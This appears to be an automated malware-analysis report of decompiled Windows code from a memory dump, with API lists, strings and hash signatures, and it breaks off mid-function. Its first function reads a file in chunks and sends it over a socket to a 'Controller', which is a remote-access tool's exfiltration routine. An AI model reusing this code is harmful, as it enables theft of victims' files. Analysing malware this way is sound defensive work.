				long _t136;
				void* _t137;
				signed int _t138;
				struct _OVERLAPPED* _t145;
				signed int _t148;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t173;
				long _t198;
				signed int _t203;
				void* _t216;
				union _LARGE_INTEGER _t280;
				intOrPtr _t281;
				union _LARGE_INTEGER* _t295;
				void* _t297;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t278 = __edx;
				_v68 = __ecx;
				E00401677(__ecx);
				_t302 = _t301 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t299 = _v68;
				E004016F4(__edx);
				_v28 = 0x186a0;
				_v20 = 0;
				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t310 = _t297 - 0xffffffff;
				if(_t297 != 0xffffffff) {
					_v80.LowPart = 0;
					_v80.HighPart = 0;
					__imp__GetFileSizeEx(_t297,  &_v80);
					_t203 = _v80.HighPart;
					_t117 = _v80;
					_v48 = _t203;
					_v32 = _t203;
					_v52 = _t117;
					_v16.LowPart = _t117;
					E004031DB(0,  &_v112, _a4);
					_t119 = E00411191( &_v136,  &_v112);
					_t303 = _t302 - 0x18;
					_t280 = "Uploading file to Controller: ";
					E004059B8(0, _t303, _t280, _t297, __eflags, _t119);
					_t304 = _t303 - 0x14;
					E0040207E(0, _t304, "[Info]");
					E00410B51(0);
					_t305 = _t304 + 0x30;
					E00401F97();
					E004031D1();
					_v36 = 1;
					_v40 = 0;
					_t126 = E00446DA0(_v52, _v48, 0x186a0, 0);
					_t210 = _t280;
					asm("xorps xmm0, xmm0");
					_v88 = _t126 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x3c], xmm0");
					_v84.LowPart = _t280;
					__eflags = _v48;
					if(__eflags < 0) {
						L17:
						CloseHandle(_t297);
						E00401AF7(_t299);
						_t198 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_v44 = _v64.HighPart.LowPart;
							_v64.HighPart.LowPart = _v64;
							_t136 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									_t281 = _v32;
									__eflags = _v20 - _t281;
									if(__eflags >= 0) {
										_t210 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t136 = _t210;
											_v20 = _t281;
											_v28 = _t136;
										} else {
											__eflags = _t136 - _t210;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t136);
									_t137 = E00428C9A(_t210, _t281, _t299, __eflags);
									_push(0);
									_v12 = _t137;
									_v24 = 0;
									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
									__eflags = _t138;
									if(_t138 == 0) {
										_t306 = _t305 - 0x18;
										_t216 = _t305 - 0x18;
										_push("SetFilePointerEx error");
										goto L23;
									} else {
										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
										__eflags = _t148;
										if(_t148 == 0) {
											_t306 = _t305 - 0x18;
											_t216 = _t305 - 0x18;
											_push("ReadFile error");
											L23:
											E0040207E(0, _t216);
											E0040207E(0, _t306 - 0x18, "[ERROR]");
											E00410B51(0);
											L00428C95(_v12);
											CloseHandle(_t297);
											goto L24;
										} else {
											__eflags = _v24;
											if(__eflags == 0) {
												L00428C95(_v12);
												CloseHandle(_t297);
												E00401AF7(_t299);
												_t145 = 1;
												goto L25;
											} else {
												E004031DB(0,  &_v112, _a4);
												_t154 = E004020A5(0,  &_v472, _t281, __eflags, _v12, _v24);
												_t305 = _t305 - 0x18;
												_t156 = E004110B6(0x46103c,  &_v448, _v88, _v84);
												_t157 = E004110B6(0x46103c,  &_v424, _v36, _v40);
												E00405870(_t305, E00404095(0x46103c,  &_v136, E00404095(0x46103c,  &_v160, E00404095(0x46103c,  &_v184, E00405870( &_v208, E00404095(0x46103c,  &_v232, E00405870( &_v256, E00404095(0x46103c,  &_v280, E00404095(0x46103c,  &_v304, E00404095(0x46103c,  &_v328, E00404095(0x46103c,  &_v352, E00404095(0x46103c,  &_v376, E004111F2(0x46103c,  &_v400,  &_v112), __eflags, 0x46103c), __eflags,  &_a8), __eflags, 0x46103c), __eflags,  &_a32), __eflags, 0x46103c), _t157), __eflags, 0x46103c), _t156), __eflags, 0x46103c), __eflags,  &_a56), __eflags, 0x46103c), _t154);
												_t299 = _v68;
												_push(0x52);
												_t173 = E00401790(0x46103c, _v68, _t171, __eflags);
												__eflags = _t173 - 0xffffffff;
												E00401F97();
												E00401F97();
												E00401F97();
												E00401F97();
												E00401F97();
												E00401F97();
												E00401F97();
												E00401F97();
												E00401F97();
												E00401F97();
												E00401F97();
												E00401F97();
												E00401F97();
												E00401F97();
												E00401F97();
												E004031D1();
												__eflags = 0x461000 | _t173 == 0xffffffff;
												if((0x461000 | _t173 == 0xffffffff) != 0) {
													E00401AF7(_t299);
													CloseHandle(_t297);
													L00428C95(_v12);
													_t198 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									L00428C95(_v12);
									_t136 = _v28;
									_v16.LowPart = _v16 - _t136;
									_t295 = _v44;
									asm("sbb ecx, [ebp-0x10]");
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t210 = _v64.HighPart.LowPart + _t136;
									_v64.HighPart = _t210;
									asm("adc edx, [ebp-0x10]");
									_v44 = _t295;
									__eflags = _t295 - _v48;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t210 - _v52;
							} while (_t210 < _v52);
							goto L17;
						} else {
							__eflags = _v52;
							if(_v52 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E004020E6(0, _t302 - 0x18, _t278, _t310,  &_a8);
					_push(0x53);
					E00401790(0, 0x4610f8, _t278, _t310);
					L24:
					E00401AF7(_t299);
					_t145 = 0;
					L25:
					_t198 = _t145;
				}
				L18:
				E00401F97();
				E00401F97();
				E00401F97();
				return _t198;
			}






























































                                            0x004044c5
                                            0x004044d1
                                            0x004044d4
                                            0x004044d9
                                            0x004044e3
                                            0x004044e4
                                            0x004044e5
                                            0x004044e6
                                            0x004044e7
                                            0x004044ec
                                            0x004044f3
                                            0x0040450d
                                            0x00404516
                                            0x00404518
                                            0x0040451b
                                            0x0040453f
                                            0x00404544
                                            0x00404547
                                            0x0040454d
                                            0x00404550
                                            0x00404556
                                            0x00404559
                                            0x0040455f
                                            0x00404562
                                            0x00404565
                                            0x00404573
                                            0x00404578
                                            0x0040457b
                                            0x00404583
                                            0x00404588
                                            0x00404592
                                            0x00404597
                                            0x0040459c
                                            0x004045a5
                                            0x004045ad
                                            0x004045b8
                                            0x004045c3
                                            0x004045c9
                                            0x004045d1
                                            0x004045d3
                                            0x004045d6
                                            0x004045d9
                                            0x004045db
                                            0x004045e0
                                            0x004045e3
                                            0x004045e6
                                            0x00404887
                                            0x00404888
                                            0x00404890
                                            0x00404895
                                            0x004045ec
                                            0x004045ec
                                            0x004045f7
                                            0x004045fa
                                            0x00404600
                                            0x00404603
                                            0x00404603
                                            0x00404608
                                            0x00404608
                                            0x00404608
                                            0x00404608
                                            0x0040460b
                                            0x0040460e
                                            0x00404610
                                            0x00404613
                                            0x00404619
                                            0x00404619
                                            0x0040461b
                                            0x0040461e
                                            0x00404615
                                            0x00404615
                                            0x00404617
                                            0x00000000
                                            0x00000000
                                            0x00404617
                                            0x00404613
                                            0x00404621
                                            0x00404622
                                            0x00404628
                                            0x0040462d
                                            0x00404633
                                            0x00404637
                                            0x0040463d
                                            0x0040463f
                                            0x004048fd
                                            0x00404900
                                            0x00404902
                                            0x00000000
                                            0x00404645
                                            0x00404652
                                            0x00404658
                                            0x0040465a
                                            0x004048f1
                                            0x004048f4
                                            0x004048f6
                                            0x00404907
                                            0x00404907
                                            0x00404916
                                            0x0040491b
                                            0x00404923
                                            0x0040492c
                                            0x00000000
                                            0x00404660
                                            0x00404660
                                            0x00404664
                                            0x004048d8
                                            0x004048df
                                            0x004048e7
                                            0x004048ee
                                            0x00000000
                                            0x0040466a
                                            0x00404670
                                            0x00404681
                                            0x00404686
                                            0x004046a3
                                            0x004046b8
                                            0x00404777
                                            0x0040477c
                                            0x00404780
                                            0x00404784
                                            0x00404789
                                            0x00404795
                                            0x004047a0
                                            0x004047ab
                                            0x004047b6
                                            0x004047c1
                                            0x004047cc
                                            0x004047d7
                                            0x004047e2
                                            0x004047ed
                                            0x004047f8
                                            0x00404803
                                            0x0040480e
                                            0x00404819
                                            0x00404824
                                            0x0040482f
                                            0x00404837
                                            0x0040483c
                                            0x0040483e
                                            0x004048bc
                                            0x004048c2
                                            0x004048cb
                                            0x004048d1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040483e
                                            0x00404664
                                            0x0040465a
                                            0x00000000
                                            0x00404840
                                            0x00404843
                                            0x00404848
                                            0x0040484b
                                            0x0040484e
                                            0x00404855
                                            0x00404858
                                            0x0040485c
                                            0x00404864
                                            0x00404865
                                            0x00404868
                                            0x0040486a
                                            0x0040486d
                                            0x00404870
                                            0x00404873
                                            0x00404873
                                            0x0040487c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040487e
                                            0x0040487e
                                            0x0040487e
                                            0x00000000
                                            0x004045ee
                                            0x004045ee
                                            0x004045f1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004045f1
                                            0x004045ec
                                            0x0040451d
                                            0x00404526
                                            0x0040452b
                                            0x00404532
                                            0x00404932
                                            0x00404934
                                            0x00404939
                                            0x0040493b
                                            0x0040493b
                                            0x0040493b
                                            0x00404897
                                            0x0040489a
                                            0x004048a2
                                            0x004048aa
                                            0x004048b7

                                            APIs
                                              • Part of subcall function 004016F4: connect.WS2_32(?,?,00000010), ref: 0040170F
                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00404510
                                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00404547
                                            • __aulldiv.LIBCMT ref: 004045C9
                                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 00404637
                                            • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 00404652
                                              • Part of subcall function 00401790: send.WS2_32(?,00000000,00000000,00000000), ref: 00401804
                                              • Part of subcall function 00401AF7: closesocket.WS2_32(000000FF), ref: 00401AFD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]$hF
                                            • API String ID: 1319223106-3456088765
                                            • Opcode ID: 35f3b726e1b9be3a92119ffc1ef184020196af95d6d0ee2481ef5212bb2d1726
                                            • Instruction ID: 51db8e9ccb05cae95b36504e667853d3bea5549e2010692671d2419de4730bf3
                                            • Opcode Fuzzy Hash: 35f3b726e1b9be3a92119ffc1ef184020196af95d6d0ee2481ef5212bb2d1726
                                            • Instruction Fuzzy Hash: 83C18B71E00209ABCB14FFA5DC929EEBB75AF45318F10817EE505B62A1EF381E448F58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041262A, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 64%
                                            			E0041262A(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x460e20 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x460e28);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x460e24) == 0) {
							ShowWindow( *0x460e24, 9);
							SetForegroundWindow( *0x460e24);
						} else {
							ShowWindow( *0x460e24, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x460e20, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L7:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L7;
			}








                                            0x00412632
                                            0x00412635
                                            0x00412706
                                            0x00412713
                                            0x0041271b
                                            0x00412721
                                            0x00000000
                                            0x00412721
                                            0x0041263b
                                            0x00412640
                                            0x004126ef
                                            0x00000000
                                            0x00000000
                                            0x004126f8
                                            0x00412700
                                            0x00412700
                                            0x0041264b
                                            0x0041265b
                                            0x00412660
                                            0x004126bd
                                            0x004126d7
                                            0x004126e3
                                            0x004126bf
                                            0x004126c7
                                            0x004126c7
                                            0x00000000
                                            0x004126bd
                                            0x00412665
                                            0x00412684
                                            0x0041268d
                                            0x004126a7
                                            0x00000000
                                            0x004126a7
                                            0x00412667
                                            0x0041266a
                                            0x0041266d
                                            0x00412672
                                            0x00000000
                                            0x00412675
                                            0x0041264d
                                            0x00412650
                                            0x00412653
                                            0x00000000

                                            APIs
                                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 00412675
                                            • GetCursorPos.USER32(?), ref: 00412684
                                            • SetForegroundWindow.USER32(?), ref: 0041268D
                                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 004126A7
                                            • Shell_NotifyIconA.SHELL32(00000002,00460E28), ref: 004126F8
                                            • ExitProcess.KERNEL32 ref: 00412700
                                            • CreatePopupMenu.USER32 ref: 00412706
                                            • AppendMenuA.USER32 ref: 0041271B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                            • String ID: Close
                                            • API String ID: 1657328048-3535843008
                                            • Opcode ID: c5bbf6a08e4a82c1fd20b1349749b63d941a914305074ea4ff35769a595149a3
                                            • Instruction ID: c32940411861b14c3950e241e73d787bb9d4d4f6921d2b6be3723ac2de0728e6
                                            • Opcode Fuzzy Hash: c5bbf6a08e4a82c1fd20b1349749b63d941a914305074ea4ff35769a595149a3
                                            • Instruction Fuzzy Hash: B0212676140105AFDB165FA4EE0EAAB3B75FB0A301F104526F901941F1D7F69D60AB19
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00436B52, Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 91%
                                            			E00436B52(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x45f014; // 0x8d941b67
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x44d6e0;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x44d960;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x44dae0;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return E004294CB(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = E004368EF(_t172, 1, 4);
					E00437795(_t170);
					_v32 = E004368EF(_t172, 0x180, 2);
					E00437795(_t170);
					_v36 = E004368EF(_t172, 0x180, 1);
					E00437795(_t170);
					_v40 = E004368EF(_t172, 0x180, 1);
					E00437795(_t170);
					_t197 = E004368EF(_t172, 0x101, 1);
					_v52 = _t197;
					E00437795(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E00437795(_v44);
						E00437795(_v32);
						E00437795(_v36);
						E00437795(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E0043A0BF(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E0043A0BF(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E0043EB9C(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E00437795( *(_t215 + 0x90) - 0xfe);
										E00437795( *(_t215 + 0x94) - 0x80);
										E00437795( *(_t215 + 0x98) - 0x80);
										E00437795( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								E00437795(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E00440E70(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}



















































                                            0x00436b5a
                                            0x00436b61
                                            0x00436b66
                                            0x00436b69
                                            0x00436b6c
                                            0x00436b6f
                                            0x00436b72
                                            0x00436b78
                                            0x00436b7b
                                            0x00436b7e
                                            0x00436b81
                                            0x00436b84
                                            0x00436b89
                                            0x00436ea9
                                            0x00436eab
                                            0x00436ead
                                            0x00436ead
                                            0x00436eb0
                                            0x00436eb6
                                            0x00436eb8
                                            0x00436ebe
                                            0x00436ec4
                                            0x00436ece
                                            0x00436ed8
                                            0x00436edf
                                            0x00436eef
                                            0x00436eef
                                            0x00436b8f
                                            0x00436b92
                                            0x00436b97
                                            0x00436bb5
                                            0x00436bbf
                                            0x00436bc2
                                            0x00436bd5
                                            0x00436bd8
                                            0x00436be6
                                            0x00436be9
                                            0x00436bf7
                                            0x00436bfa
                                            0x00436c0b
                                            0x00436c0e
                                            0x00436c11
                                            0x00436c16
                                            0x00436c1c
                                            0x00436e70
                                            0x00436e73
                                            0x00436e7b
                                            0x00436e83
                                            0x00436e8b
                                            0x00436e95
                                            0x00436e95
                                            0x00000000
                                            0x00436c45
                                            0x00436c45
                                            0x00436c47
                                            0x00436c47
                                            0x00436c4a
                                            0x00436c4b
                                            0x00436c61
                                            0x00000000
                                            0x00000000
                                            0x00436c67
                                            0x00436c6a
                                            0x00436c6d
                                            0x00000000
                                            0x00000000
                                            0x00436c7a
                                            0x00436c7d
                                            0x00436c80
                                            0x00436c9d
                                            0x00436ca2
                                            0x00436ca5
                                            0x00436ca7
                                            0x00000000
                                            0x00000000
                                            0x00436cc1
                                            0x00436cd1
                                            0x00436cd6
                                            0x00436cdb
                                            0x00000000
                                            0x00000000
                                            0x00436ce5
                                            0x00436d12
                                            0x00436d28
                                            0x00436d2b
                                            0x00436d30
                                            0x00436d35
                                            0x00000000
                                            0x00000000
                                            0x00436d3b
                                            0x00436d40
                                            0x00436d46
                                            0x00436d49
                                            0x00436d4c
                                            0x00436d4f
                                            0x00436d52
                                            0x00436d55
                                            0x00436d5c
                                            0x00436d5f
                                            0x00436d62
                                            0x00436d64
                                            0x00436d6a
                                            0x00436d6d
                                            0x00436d6f
                                            0x00436db1
                                            0x00436db3
                                            0x00436dbc
                                            0x00436dc1
                                            0x00436dc4
                                            0x00436dce
                                            0x00436dd0
                                            0x00436dd3
                                            0x00436dd5
                                            0x00436dde
                                            0x00436de0
                                            0x00436de2
                                            0x00436de3
                                            0x00436dee
                                            0x00436df3
                                            0x00436df7
                                            0x00436e05
                                            0x00436e18
                                            0x00436e26
                                            0x00436e31
                                            0x00436e36
                                            0x00436df7
                                            0x00436e39
                                            0x00436e3c
                                            0x00436e42
                                            0x00436e4b
                                            0x00436e50
                                            0x00436e59
                                            0x00436e62
                                            0x00436e6b
                                            0x00436e96
                                            0x00436e99
                                            0x00000000
                                            0x00436d76
                                            0x00436d76
                                            0x00436d79
                                            0x00436d79
                                            0x00436d7d
                                            0x00000000
                                            0x00000000
                                            0x00436d7f
                                            0x00436d88
                                            0x00436da6
                                            0x00436da6
                                            0x00436dac
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00436dac
                                            0x00436d90
                                            0x00436d93
                                            0x00436d98
                                            0x00436d99
                                            0x00436d9c
                                            0x00436da2
                                            0x00000000
                                            0x00436d93
                                            0x00000000
                                            0x00436dae
                                            0x00436cec
                                            0x00436cec
                                            0x00436cef
                                            0x00436cef
                                            0x00436cf3
                                            0x00000000
                                            0x00000000
                                            0x00436cf5
                                            0x00436cf9
                                            0x00436d06
                                            0x00436cfe
                                            0x00436d02
                                            0x00436d02
                                            0x00436d03
                                            0x00436d03
                                            0x00436d0a
                                            0x00436d0d
                                            0x00436d10
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00436d10
                                            0x00000000
                                            0x00436cef
                                            0x00436ce5
                                            0x00436c1c
                                            0x00436ba5
                                            0x00436baa
                                            0x00436baf
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: _free$Info
                                            • String ID:
                                            • API String ID: 2509303402-0
                                            • Opcode ID: 3651b41d432743d6b5b86272b7f4514bd93433da6e3d056af77df51b28b9994e
                                            • Instruction ID: 9fb5df3ce2f4a3bb42546864ebd0bc90f080c9d14cfddd6f8c50626fa3affc4a
                                            • Opcode Fuzzy Hash: 3651b41d432743d6b5b86272b7f4514bd93433da6e3d056af77df51b28b9994e
                                            • Instruction Fuzzy Hash: 30B1B3B1900206AFDB21DF75C881BEEB7F5BF0D304F15902EE499AB342E779A8458B14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043ED36, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0043ED36(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x45f188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00437795(_t46);
							E0043DF72( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00437795(_t47);
							E0043E42C( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00437795( *((intOrPtr*)(_t74 + 0x7c)));
						E00437795( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00437795( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00437795( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00437795( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00437795( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0043EEA9( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x45f2d8) {
